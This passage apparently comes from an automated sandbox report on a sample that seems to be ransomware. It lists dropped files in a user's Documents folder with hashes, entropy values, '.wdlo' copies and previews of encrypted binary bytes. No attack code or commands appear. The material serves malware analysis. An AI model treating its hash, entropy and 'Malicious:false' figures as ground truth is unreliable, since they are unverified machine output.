..}...3...)../.:H.Q.jy..L]..Q..U....1.4.....s.mN...k.2f.IL...F.(....xvn.`2.-.......h5.M.&..F}~:2am...h.."..?..(..x..-.df~.6..X;&.X.....f.5QThX.....8....K....H...3...y.}pH.C...o..d..^...........tk..ki...1...e.8vy.....Eo..Y|.[I..|....{^...uq.a8.g./...5g...\.QHql...kapo..K.h...1..o..@...!.......[.C}..F..oa.'.....gy.z..e..R.........V..D".!.x.PI.q.r!....[.1O|D].C....w...V^..L..S]...S..&X..G..B....O.p9.....J....!...$....k.r.M.).w...w|.l......4.$.8....y>{B....|.......M...,.E..wsj.Q?..P.>/........mW..lA...Vhk...$.Z.....f.c9...t.G7....J.W.wE.K..`...vTv.W.e....q..S..XA.t..dF......h.f...O..m....1G....1T/..@..6...w...k...R.={.y.3..ln!...E......yM.8./.@.....ta..OD....HT._K..//1v..Vt.|TU..R....F...:.Z..-.o..#.&.e..

                  C:\Users\user\Desktop\WSHEJMDVQC.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.837372328203583
                  Encrypted:false
                  SSDEEP:24:+0RsMAKWyECnO2nwZUvpiwKoxiLQ63nMjGVVfdFN+eZ3zbD:eMAhvMnNvw/oxik68qVVfRzZ3nD
                  MD5:36284769F6E5D19C04001137BFB2CD0E
                  SHA1:CC4AEB7D4D9EED6AAB8DD3D48D2A0AD55BCCE078
                  SHA-256:152183D9E7AB905A12F838B533B5F4AE1F0CF2A3D40748EBBF99C4FFDCB2F087
                  SHA-512:68622606565749D2846C9527254FDE2D42099594255846FEB126F97CC0D6D98114134A895692844235258773C5AFD46020144BD795086B08739F58E1E93A85F6
                  Malicious:false
                  Preview:WSHEJ ...j..o.c........!Z..+!<.i...e.t...#A....+I...H.S...X.........$4I...C..wZ.B%...B?....U.o..-.*.....).aM\.7.^.y....~.SN...a,o).TA..<.5.......YM...w.<...(.H..r...>..3....P.a...2...^.6.x;3E......x..6...R.....w;.x..lu..-....(....3{...+.. ..}...3...)../.:H.Q.jy..L]..Q..U....1.4.....s.mN...k.2f.IL...F.(....xvn.`2.-.......h5.M.&..F}~:2am...h.."..?..(..x..-.df~.6..X;&.X.....f.5QThX.....8....K....H...3...y.}pH.C...o..d..^...........tk..ki...1...e.8vy.....Eo..Y|.[I..|....{^...uq.a8.g./...5g...\.QHql...kapo..K.h...1..o..@...!.......[.C}..F..oa.'.....gy.z..e..R.........V..D".!.x.PI.q.r!....[.1O|D].C....w...V^..L..S]...S..&X..G..B....O.p9.....J....!...$....k.r.M.).w...w|.l......4.$.8....y>{B....|.......M...,.E..wsj.Q?..P.>/........mW..lA...Vhk...$.Z.....f.c9...t.G7....J.W.wE.K..`...vTv.W.e....q..S..XA.t..dF......h.f...O..m....1G....1T/..@..6...w...k...R.={.y.3..ln!...E......yM.8./.@.....ta..OD....HT._K..//1v..Vt.|TU..R....F...:.Z..-.o..#.&.e..

                  C:\Users\user\Documents\AQRFEVRTGL.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.847811785426234
                  Encrypted:false
                  SSDEEP:24:VSvOmxFnzb9pi9b7ANY/lv19k8qXByAK4GfhEY4l400wrKjuvplU3zbD:VSvOmxd9piNANo+jhK4Gf6Y450GJvplm
                  MD5:EAF807E147F6FE0FC509DBCFF20CDD88
                  SHA1:50111373E500C4AB08D87AE673A4A0ECDD868C0C
                  SHA-256:71DE8FA4A1D0091BCF636F83E64898110E8DC0287A7E061869454FFDD3AD8E90
                  SHA-512:F7194A89DAFF6A6F52BD9E947C4CD510D3D1B87E176A089B0C71FC710C1D7BA9C53974A17336AF877E77EF6815D776BED478072EF26C11E13F63A3B1FB29823E
                  Malicious:false
                  Preview:AQRFEn.[...I.....F.{O.*q<.....x&.t.....*X....\cUFyt.-@.........|...D."...Xk......U..2..........0!.:.Y..r.P..5.....!my.<..).,/...`%.a...<A..c4.~..V.Y.Sm.W...x{.~.....il.....O=....N...,......j..O......+..9.n7 .../...A...g...,.z\.6{..."F.6..........`$.,...P.uqd.i..d.j....\t..........YnRW.76.6h..1..-ce....~Ko....(...o.]........D.(?..3..%...^....I..4_f.R)...p@...Z.J.....q].7....X}......s..zD..s1$.....4.]....8u...{..P..k.`......8..`Bg.j(j....1.{..tg.<.\.X9>E4.m~.2...T...16....e~7.7..i#Oa..X...O...W:..zb...+.,.Q..f........m.^.CZ%<..}D..4.........Z..r......'......r..E....Pj:+I....S....:..."...*........h.J.U+?%.P..q..l n....$G.'&K(.A..Pq?.".e...uB...,.%..3ut...BK..4gZ....bA_.L|.y/..<(:4./a6...P.K.f.gC2.H....%.........#.....Q....W.tt....~.E..?..d.S...,.]....=.6...cD.&.'....'.tF`.Q.$..@.[..e.$.......G..T...w.Za@)gP......(....l............Y_.<.u.w.+. ..J(.}.[...........v....?......;....SX,Lw....(F...na.qcB....W>o....@:%..2>.P..e.. .}w..3.....%......&

                  C:\Users\user\Documents\AQRFEVRTGL.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.847811785426234
                  Encrypted:false
                  SSDEEP:24:VSvOmxFnzb9pi9b7ANY/lv19k8qXByAK4GfhEY4l400wrKjuvplU3zbD:VSvOmxd9piNANo+jhK4Gf6Y450GJvplm
                  MD5:EAF807E147F6FE0FC509DBCFF20CDD88
                  SHA1:50111373E500C4AB08D87AE673A4A0ECDD868C0C
                  SHA-256:71DE8FA4A1D0091BCF636F83E64898110E8DC0287A7E061869454FFDD3AD8E90
                  SHA-512:F7194A89DAFF6A6F52BD9E947C4CD510D3D1B87E176A089B0C71FC710C1D7BA9C53974A17336AF877E77EF6815D776BED478072EF26C11E13F63A3B1FB29823E
                  Malicious:false
                  Preview:AQRFEn.[...I.....F.{O.*q<.....x&.t.....*X....\cUFyt.-@.........|...D."...Xk......U..2..........0!.:.Y..r.P..5.....!my.<..).,/...`%.a...<A..c4.~..V.Y.Sm.W...x{.~.....il.....O=....N...,......j..O......+..9.n7 .../...A...g...,.z\.6{..."F.6..........`$.,...P.uqd.i..d.j....\t..........YnRW.76.6h..1..-ce....~Ko....(...o.]........D.(?..3..%...^....I..4_f.R)...p@...Z.J.....q].7....X}......s..zD..s1$.....4.]....8u...{..P..k.`......8..`Bg.j(j....1.{..tg.<.\.X9>E4.m~.2...T...16....e~7.7..i#Oa..X...O...W:..zb...+.,.Q..f........m.^.CZ%<..}D..4.........Z..r......'......r..E....Pj:+I....S....:..."...*........h.J.U+?%.P..q..l n....$G.'&K(.A..Pq?.".e...uB...,.%..3ut...BK..4gZ....bA_.L|.y/..<(:4./a6...P.K.f.gC2.H....%.........#.....Q....W.tt....~.E..?..d.S...,.]....=.6...cD.&.'....'.tF`.Q.$..@.[..e.$.......G..T...w.Za@)gP......(....l............Y_.<.u.w.+. ..J(.}.[...........v....?......;....SX,Lw....(F...na.qcB....W>o....@:%..2>.P..e.. .}w..3.....%......&

                  C:\Users\user\Documents\AQRFEVRTGL.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.843260379674571
                  Encrypted:false
                  SSDEEP:24:VXR7lHIDm1cMDpO2GNiWO3KThvH2l8pOChjX6bkrZyE1FNY58BA/CsDOn3zbD:VxsyXg2dWiovWl807kr4EzK585sD63nD
                  MD5:9FA83865392C2FDA666912C09245C59B
                  SHA1:580DCB3E3DA82D8786339C2E5EE59B86DE9BBCBA
                  SHA-256:ABEF896D3C22173961138D1B28853575C84441FEACC2A5F9A3A06C3B80A691FA
                  SHA-512:864F007BB2559165C0D65A5E559C1CBC53185253ADAB62533FA2D023E4ED15C5B676BABA8F9CD57B74478885ED0EEA607B71C79D47826AE4FE20B42FA0332007
                  Malicious:false
                  Preview:AQRFE.`.F.&...}.@d..,...+u=.....:.t..5)*:....9.*.:.k......*.'._;d".o.]..B......3..K<.7p.h....F.,z.......qy).....q./.>..L.t....17n.g.E..|5a..F........J^8a.....Z.V.,9T4..........L......&5!.....r..o.~$..%I..n.}.u..N-.2O.<A.Q.<.|..2..B.L......#..F....:.ZB../...nd.N9...>R..i1......J....3...J..E7.9U..5R....Qz.8Q.!.>...c..+.h..1e.$r..n......dC,.s.C...C.B.........H.9......8(.-...A..zk..!...{.R@.......].-..V....e%...s......P.R...)B0.$.o.gF.a$....9.UT.v......P........r...e=".vv......E..D.......LE.2.._r.b\..q6O.n....48.......j..-i.O..c:j..c".......R."].*.].$......L.........KZM.%_<....P..N.......1....X...".\n.|..afCL...e...^...Ce..D.?.[L......U.vL}..X.U.B.ID...I..H.mhi(d..4......5d,..G..kC.I...Cc,3|~..[g..N.`WwG4.... .../.J.)Vf_.h._8.H.1.ii....^W..n.d....P.n'_.....0+5...;...W....e.?.0.......S..RC....p...V..........k.I;(..%......E8.*c.g.~5...s.^..m....Du..2fC%...FfM...~D.0.c.U\..Jte..7x.B.....q.0,.~..*.......[.'o%.c....a.8.u=/@Z%.S.nOyv6).@.^.."

                  C:\Users\user\Documents\AQRFEVRTGL.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.843260379674571
                  Encrypted:false
                  SSDEEP:24:VXR7lHIDm1cMDpO2GNiWO3KThvH2l8pOChjX6bkrZyE1FNY58BA/CsDOn3zbD:VxsyXg2dWiovWl807kr4EzK585sD63nD
                  MD5:9FA83865392C2FDA666912C09245C59B
                  SHA1:580DCB3E3DA82D8786339C2E5EE59B86DE9BBCBA
                  SHA-256:ABEF896D3C22173961138D1B28853575C84441FEACC2A5F9A3A06C3B80A691FA
                  SHA-512:864F007BB2559165C0D65A5E559C1CBC53185253ADAB62533FA2D023E4ED15C5B676BABA8F9CD57B74478885ED0EEA607B71C79D47826AE4FE20B42FA0332007
                  Malicious:false
                  Preview:AQRFE.`.F.&...}.@d..,...+u=.....:.t..5)*:....9.*.:.k......*.'._;d".o.]..B......3..K<.7p.h....F.,z.......qy).....q./.>..L.t....17n.g.E..|5a..F........J^8a.....Z.V.,9T4..........L......&5!.....r..o.~$..%I..n.}.u..N-.2O.<A.Q.<.|..2..B.L......#..F....:.ZB../...nd.N9...>R..i1......J....3...J..E7.9U..5R....Qz.8Q.!.>...c..+.h..1e.$r..n......dC,.s.C...C.B.........H.9......8(.-...A..zk..!...{.R@.......].-..V....e%...s......P.R...)B0.$.o.gF.a$....9.UT.v......P........r...e=".vv......E..D.......LE.2.._r.b\..q6O.n....48.......j..-i.O..c:j..c".......R."].*.].$......L.........KZM.%_<....P..N.......1....X...".\n.|..afCL...e...^...Ce..D.?.[L......U.vL}..X.U.B.ID...I..H.mhi(d..4......5d,..G..kC.I...Cc,3|~..[g..N.`WwG4.... .../.J.)Vf_.h._8.H.1.ii....^W..n.d....P.n'_.....0+5...;...W....e.?.0.......S..RC....p...V..........k.I;(..%......E8.*c.g.~5...s.^..m....Du..2fC%...FfM...~D.0.c.U\..Jte..7x.B.....q.0,.~..*.......[.'o%.c....a.8.u=/@Z%.S.nOyv6).@.^.."

                  C:\Users\user\Documents\AQRFEVRTGL.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.856544666195613
                  Encrypted:false
                  SSDEEP:24:VDYH3SIvTB6gbaL4nsM7Ugj1rIckSL23afYf1cjAaJhRZCeSDb3zbD:VEH3lbADL4HUY1Mi23NdckiREewb3nD
                  MD5:6B321BD001CABD4CAC955BE84D7A1817
                  SHA1:273238D8D6B8A572EB59A5414D5A8C24AF443219
                  SHA-256:3A5E4222B463AD50B507F4D0FDF9E171C695FC354D2E33EDB653662589135DFF
                  SHA-512:BB4CD875F23A90358F77162CA6520D558778986329695B15110A8AAA2D1423323483CE180FB398EF4A3C95EF0BBC69C7E5DAD26CF7868CE960D6464F6F034554
                  Malicious:false
                  Preview:AQRFE.....!..#...m^...by$U..$.y.d...;g....D.P..6U.b.O..e....n..$......;.....qL.....>1.a\..4...>..0.t;..!.8T...Q.0m.....x.}2..|....|....H..c.[R.....l.....|e.Z.'..th...'^D.M..n..B.b7.......@j[v.\%.3q.H..&i|'...&...@..).......Q=v,....8..u..9..-..0.LQ.UsM.{m....1.-.T..i.H4od.x.$......D......D..b.SS#...>ZPO.:qP.e\Ujl.x__c...\.L.......p2.q........:...;.&......... P...$2`.t..4o.....1K.V..+..../......IY..A....;.d.U..&.."._...:..j{..|.......PM.......>;.!...c....8...g..r..3..)......\.......M#......WG..R.....9.}..B+..v..V&......./k)`.~.;R....8|6X..).Q.."...d....%f`.".......h.U.p".......\e..rn.gTQI.9.-E.Q....Q....."-..Cx..l|....j(......-..).GE.M.Z.&.p?.:..jE..i:6.R..{OY9....ugU.>.w.....3..3..0......C...9.U......!..[.[.ro.A...4.>....."..=.E.....m.6a...-.mf....7.w......|....m1..B.^.9.$....^L..:7.).......F.......*...=.b.^.J..|^.U......".........l..}H6/.c..;.,..>..q...\......>&..(...D.=.So...T..&E)_.;.j..`_}...HoD.......<..........k....V.8.D..[.

                  C:\Users\user\Documents\AQRFEVRTGL.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.856544666195613
                  Encrypted:false
                  SSDEEP:24:VDYH3SIvTB6gbaL4nsM7Ugj1rIckSL23afYf1cjAaJhRZCeSDb3zbD:VEH3lbADL4HUY1Mi23NdckiREewb3nD
                  MD5:6B321BD001CABD4CAC955BE84D7A1817
                  SHA1:273238D8D6B8A572EB59A5414D5A8C24AF443219
                  SHA-256:3A5E4222B463AD50B507F4D0FDF9E171C695FC354D2E33EDB653662589135DFF
                  SHA-512:BB4CD875F23A90358F77162CA6520D558778986329695B15110A8AAA2D1423323483CE180FB398EF4A3C95EF0BBC69C7E5DAD26CF7868CE960D6464F6F034554
                  Malicious:false
                  Preview:AQRFE.....!..#...m^...by$U..$.y.d...;g....D.P..6U.b.O..e....n..$......;.....qL.....>1.a\..4...>..0.t;..!.8T...Q.0m.....x.}2..|....|....H..c.[R.....l.....|e.Z.'..th...'^D.M..n..B.b7.......@j[v.\%.3q.H..&i|'...&...@..).......Q=v,....8..u..9..-..0.LQ.UsM.{m....1.-.T..i.H4od.x.$......D......D..b.SS#...>ZPO.:qP.e\Ujl.x__c...\.L.......p2.q........:...;.&......... P...$2`.t..4o.....1K.V..+..../......IY..A....;.d.U..&.."._...:..j{..|.......PM.......>;.!...c....8...g..r..3..)......\.......M#......WG..R.....9.}..B+..v..V&......./k)`.~.;R....8|6X..).Q.."...d....%f`.".......h.U.p".......\e..rn.gTQI.9.-E.Q....Q....."-..Cx..l|....j(......-..).GE.M.Z.&.p?.:..jE..i:6.R..{OY9....ugU.>.w.....3..3..0......C...9.U......!..[.[.ro.A...4.>....."..=.E.....m.6a...-.mf....7.w......|....m1..B.^.9.$....^L..:7.).......F.......*...=.b.^.J..|^.U......".........l..}H6/.c..;.,..>..q...\......>&..(...D.=.So...T..&E)_.;.j..`_}...HoD.......<..........k....V.8.D..[.

                  C:\Users\user\Documents\BWDRWEEARI.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.824586314351698
                  Encrypted:false
                  SSDEEP:24:Z7fksFO+Wrsvjuwe1xYA2cnItalezvmH59JSN4c/C/5m9HwcNlKBPhUkCnCHu3zX:ZoqOEvjuwefbxn4EqmZ9oNrU2HwcNlKa
                  MD5:2CD4F2027394219F395A00B04617EFD0
                  SHA1:B1CD56665C19733F463963EB056C01352D2FEC09
                  SHA-256:736524C7337593F829CDCFA9405F708B0FA1F6F40CF6ACA81FD9C0C1466887A8
                  SHA-512:7FFB306C1DADDF19A39A036B7D212721A738555A0FCBA25A34F72BA0D786F397ABFBA1ABCE43C93BF7049FE21E4628E547D76FA13E9F0B8C1072F5A8CBDA8BA1
                  Malicious:false
                  Preview:BWDRW..t...i....v.....dVO...*..C...0|.^.S..=..^^..t....h.Wl{.|c....Y..rP.Le.K.K.........-.,h..)..l.......... ..dG.5H......._^....F:.0@N..x.uP...?....6H<vW.2.B.......;..k(......jY.|.G.h.M0k.X6..W..90u...h..+.!.L.3.....,..W04.Ss...%d>~....r..;Yyo.}.w.*......F..=..Y..w..o-5.,.8.\/.R..%tp..mp.[.}^...PAE.....s...(P-........^..m.7...........*}T|...s6...|.?..OB..`.:E...u. &+..KC......j../...vqP...=Y.ls.8|t.1*9.+...A..p.....vE.. m|.*..N.T.Y.rO.8..C.O...U..mY.%..Ko.N{E.S.p.YO.....:>.......".h.A..Of._GkfS.. >.......Q<...IH.\......,.+.w..F..g..h........y.....O.3..9.f1B.$tq6t>.<q..mD........#94.,...+Z.........[.g...../.m.....g...5 1....k...U}..+..P.....E3C|.G>D......[zl......=x...P|..E.*..P..>sa...S=.T..IL.I.S<........E..o...>..... .=QF..t.a-..._u..=.b....R...@..o.a#./.N.(<m......7..3_V.Z.*..K..m..t...{T..N...^......n....x.0@Qmv..&Y=.....(^.l6{1iP..e...N....-...*:ns..VOY.=/...G..... ..*.j...}...j.zD..XZ..5I.....}.. D..!.u...Z.fl..

                  C:\Users\user\Documents\BWDRWEEARI.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.824586314351698
                  Encrypted:false
                  SSDEEP:24:Z7fksFO+Wrsvjuwe1xYA2cnItalezvmH59JSN4c/C/5m9HwcNlKBPhUkCnCHu3zX:ZoqOEvjuwefbxn4EqmZ9oNrU2HwcNlKa
                  MD5:2CD4F2027394219F395A00B04617EFD0
                  SHA1:B1CD56665C19733F463963EB056C01352D2FEC09
                  SHA-256:736524C7337593F829CDCFA9405F708B0FA1F6F40CF6ACA81FD9C0C1466887A8
                  SHA-512:7FFB306C1DADDF19A39A036B7D212721A738555A0FCBA25A34F72BA0D786F397ABFBA1ABCE43C93BF7049FE21E4628E547D76FA13E9F0B8C1072F5A8CBDA8BA1
                  Malicious:false
                  Preview:BWDRW..t...i....v.....dVO...*..C...0|.^.S..=..^^..t....h.Wl{.|c....Y..rP.Le.K.K.........-.,h..)..l.......... ..dG.5H......._^....F:.0@N..x.uP...?....6H<vW.2.B.......;..k(......jY.|.G.h.M0k.X6..W..90u...h..+.!.L.3.....,..W04.Ss...%d>~....r..;Yyo.}.w.*......F..=..Y..w..o-5.,.8.\/.R..%tp..mp.[.}^...PAE.....s...(P-........^..m.7...........*}T|...s6...|.?..OB..`.:E...u. &+..KC......j../...vqP...=Y.ls.8|t.1*9.+...A..p.....vE.. m|.*..N.T.Y.rO.8..C.O...U..mY.%..Ko.N{E.S.p.YO.....:>.......".h.A..Of._GkfS.. >.......Q<...IH.\......,.+.w..F..g..h........y.....O.3..9.f1B.$tq6t>.<q..mD........#94.,...+Z.........[.g...../.m.....g...5 1....k...U}..+..P.....E3C|.G>D......[zl......=x...P|..E.*..P..>sa...S=.T..IL.I.S<........E..o...>..... .=QF..t.a-..._u..=.b....R...@..o.a#./.N.(<m......7..3_V.Z.*..K..m..t...{T..N...^......n....x.0@Qmv..&Y=.....(^.l6{1iP..e...N....-...*:ns..VOY.=/...G..... ..*.j...}...j.zD..XZ..5I.....}.. D..!.u...Z.fl..

                  C:\Users\user\Documents\BXAJUJAOEO.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.841190898399862
                  Encrypted:false
                  SSDEEP:24:j6HInLmp60UtUT94i1Us0xuU3egq+nKSi3kNgS/0JOAOS/3zbD:GHiLE91nQuoFq2NgLgS/3nD
                  MD5:BF1B42CBFFA8217F90CA8FC16E79DBD9
                  SHA1:657887D59A01548EC11DE422FB08423F89D35CAF
                  SHA-256:6AAA2B27CF28439352EB41DAE83823384ECDD1A00C0F6E899BAAA1B0EB65E145
                  SHA-512:B80D9225119D01AC5C885D7C7B42F32032BFBF3AB287481D06C071B43EC60CD4EF49FFFCC5B0D03735714182C70E64FF4B58C576EF4B24B42F4D1F8022E7C197
                  Malicious:false
                  Preview:BXAJU6.(..#D..$My...S.n...T.sc.4.......t..$rd..:f.i..j.H.P\".C...........b%\..*..,......g. `Q.&.lW..s...'\."E.0'TXc]2r-B}#..*.......UBe..].{.(..)k.n....W.F[..........hD)...:..K.BD~mN.$8....3.F.........N......n=.([.P?.3.b.S..N....J.<E../..dq...s.[~...i....C.....W.i.?...v>"......?-..3. Q..`......S....S.T....I9...!.KA.A..Y.3.#b....Lr..@.gKLb.......~...4...Y\8.H.iV.3G......>$....Kk.H'...P.U..-..=w......`y.+....YyD.^V...._...$..(t...KB..P.2W^.\........5{..F.^...R..b<.~...0.?6..HP....t.n..K...x;...:.q.R/..D=.V_.l.!.t.'#....>.R-*...4..O...u._}..a?,.. ...D6.... ...,8..K8_.e....r.v-..;l..;Qj..?..%...^(.......V]vwm ].....7....\,O..L..[f.....};.E...Y.N."....+...8..?-.....~g(8.....8[As,..Ln+OF.0z.v......(..(.p..5...#o8..U.Gv.....U..F..7.S....8...D8....._..c.....R_.b.K8..0.)pB.V6..>qJ.....(Z..8...:?.......s..[..K3..t.4E...=..sY$.0s..$S... .U.<.GY..k.....y..~."F.....g..Br[..Y4V.....k.8..in..5..z..^.yF15..J.TT../.....:]...$..j.1i....3..1.....y.......i..

                  C:\Users\user\Documents\BXAJUJAOEO.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.841190898399862
                  Encrypted:false
                  SSDEEP:24:j6HInLmp60UtUT94i1Us0xuU3egq+nKSi3kNgS/0JOAOS/3zbD:GHiLE91nQuoFq2NgLgS/3nD
                  MD5:BF1B42CBFFA8217F90CA8FC16E79DBD9
                  SHA1:657887D59A01548EC11DE422FB08423F89D35CAF
                  SHA-256:6AAA2B27CF28439352EB41DAE83823384ECDD1A00C0F6E899BAAA1B0EB65E145
                  SHA-512:B80D9225119D01AC5C885D7C7B42F32032BFBF3AB287481D06C071B43EC60CD4EF49FFFCC5B0D03735714182C70E64FF4B58C576EF4B24B42F4D1F8022E7C197
                  Malicious:false
                  Preview:BXAJU6.(..#D..$My...S.n...T.sc.4.......t..$rd..:f.i..j.H.P\".C...........b%\..*..,......g. `Q.&.lW..s...'\."E.0'TXc]2r-B}#..*.......UBe..].{.(..)k.n....W.F[..........hD)...:..K.BD~mN.$8....3.F.........N......n=.([.P?.3.b.S..N....J.<E../..dq...s.[~...i....C.....W.i.?...v>"......?-..3. Q..`......S....S.T....I9...!.KA.A..Y.3.#b....Lr..@.gKLb.......~...4...Y\8.H.iV.3G......>$....Kk.H'...P.U..-..=w......`y.+....YyD.^V...._...$..(t...KB..P.2W^.\........5{..F.^...R..b<.~...0.?6..HP....t.n..K...x;...:.q.R/..D=.V_.l.!.t.'#....>.R-*...4..O...u._}..a?,.. ...D6.... ...,8..K8_.e....r.v-..;l..;Qj..?..%...^(.......V]vwm ].....7....\,O..L..[f.....};.E...Y.N."....+...8..?-.....~g(8.....8[As,..Ln+OF.0z.v......(..(.p..5...#o8..U.Gv.....U..F..7.S....8...D8....._..c.....R_.b.K8..0.)pB.V6..>qJ.....(Z..8...:?.......s..[..K3..t.4E...=..sY$.0s..$S... .U.<.GY..k.....y..~."F.....g..Br[..Y4V.....k.8..in..5..z..^.yF15..J.TT../.....:]...$..j.1i....3..1.....y.......i..

                  C:\Users\user\Documents\BXAJUJAOEO.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.852216301744792
                  Encrypted:false
                  SSDEEP:24:oXj44LtWoGY2lcYRshTqFGSt3Ebu4yOF3i1r95sF/mvzh2BZ3IkQkpdI3zbD:74RrYG+Au4yOq958s8vs0dI3nD
                  MD5:DD567D41DF662E37EA786C4BFAD92293
                  SHA1:8CAD73C008B09C08E6074B3D2B17AA8B8FD48A03
                  SHA-256:DB5B936BB6AE6FCFE7AD1121BA49A57BEBC694591EC4FC40A790AD33273C33F8
                  SHA-512:B617704848D0B373D147EA08D9F6FCE719EADA198B10CAB3B4F068C44250090A7C9FAC9E4C1AB1B2CC6BF3C46CC96DD977B0E577CCB6CD365356015AC8EC3C36
                  Malicious:false
                  Preview:BXAJU.8qD.Tvq.+..$.....G.k.o...x.....S_..w...j..J...D&7)}...=.e..E.>..h..R...].B..F..U......n........~........r>w%L..Kh.Dv.vS.,..jf..w._a.!\.&.P....0.-...@.. sF.K.}..YZ.u..\....1.w64.c.~..*w..1..|....~.P.k0.^...a ..38..ex+.....3....Z.Y|..Z;W',..4..}.T.[..)v.d..1T.-,>..(....:8hR.$$....$..L....4A`U7.3...T!\kK......|..&".u.r\...O..^.dH.U`..Tx.0.T.......!2t.%.uSZ..d4Rq..'...#r.N....~..+.E.4jt..c.......o../..u.I!.[L..NC.]T..PB:..8&.nyH.........]..;.O.2.q..R.D..%H..~b.2.....=F5'..o5.s..,#i......G..A........+rd.I..".2&.....?.t...8..6..<...VZ..+...|...-g...M...&>..[>.{h)..x...g3..NPE.......G.*}..D.tP..2...S,.Y.T1....r..b2.....#t...y.].I.5.o.....0...."xO.CK...m.MK]...@...,V.%o.1...(.PA....j...*O..~..p.7.t.....x..e.Jz..m...|.1u.U..N.]m........@.y....A...n:;.}I..3..D..d.b.@XX'...P.'.i..h.0..=.x..I=....W..8.<*.Vg....."<.(.9^..xK.k..M.2j.H/.Z.....1X..L..-n.q..Vi.{...i3.)........,..f.*N.......|.[....SY.5...%.ek^..b.6+......>.j.{.?....'.1.

                  C:\Users\user\Documents\BXAJUJAOEO.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.852216301744792
                  Encrypted:false
                  SSDEEP:24:oXj44LtWoGY2lcYRshTqFGSt3Ebu4yOF3i1r95sF/mvzh2BZ3IkQkpdI3zbD:74RrYG+Au4yOq958s8vs0dI3nD
                  MD5:DD567D41DF662E37EA786C4BFAD92293
                  SHA1:8CAD73C008B09C08E6074B3D2B17AA8B8FD48A03
                  SHA-256:DB5B936BB6AE6FCFE7AD1121BA49A57BEBC694591EC4FC40A790AD33273C33F8
                  SHA-512:B617704848D0B373D147EA08D9F6FCE719EADA198B10CAB3B4F068C44250090A7C9FAC9E4C1AB1B2CC6BF3C46CC96DD977B0E577CCB6CD365356015AC8EC3C36
                  Malicious:false
                  Preview:BXAJU.8qD.Tvq.+..$.....G.k.o...x.....S_..w...j..J...D&7)}...=.e..E.>..h..R...].B..F..U......n........~........r>w%L..Kh.Dv.vS.,..jf..w._a.!\.&.P....0.-...@.. sF.K.}..YZ.u..\....1.w64.c.~..*w..1..|....~.P.k0.^...a ..38..ex+.....3....Z.Y|..Z;W',..4..}.T.[..)v.d..1T.-,>..(....:8hR.$$....$..L....4A`U7.3...T!\kK......|..&".u.r\...O..^.dH.U`..Tx.0.T.......!2t.%.uSZ..d4Rq..'...#r.N....~..+.E.4jt..c.......o../..u.I!.[L..NC.]T..PB:..8&.nyH.........]..;.O.2.q..R.D..%H..~b.2.....=F5'..o5.s..,#i......G..A........+rd.I..".2&.....?.t...8..6..<...VZ..+...|...-g...M...&>..[>.{h)..x...g3..NPE.......G.*}..D.tP..2...S,.Y.T1....r..b2.....#t...y.].I.5.o.....0...."xO.CK...m.MK]...@...,V.%o.1...(.PA....j...*O..~..p.7.t.....x..e.Jz..m...|.1u.U..N.]m........@.y....A...n:;.}I..3..D..d.b.@XX'...P.'.i..h.0..=.x..I=....W..8.<*.Vg....."<.(.9^..xK.k..M.2j.H/.Z.....1X..L..-n.q..Vi.{...i3.)........,..f.*N.......|.[....SY.5...%.ek^..b.6+......>.j.{.?....'.1.

                  C:\Users\user\Documents\BXAJUJAOEO.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849480405909674
                  Encrypted:false
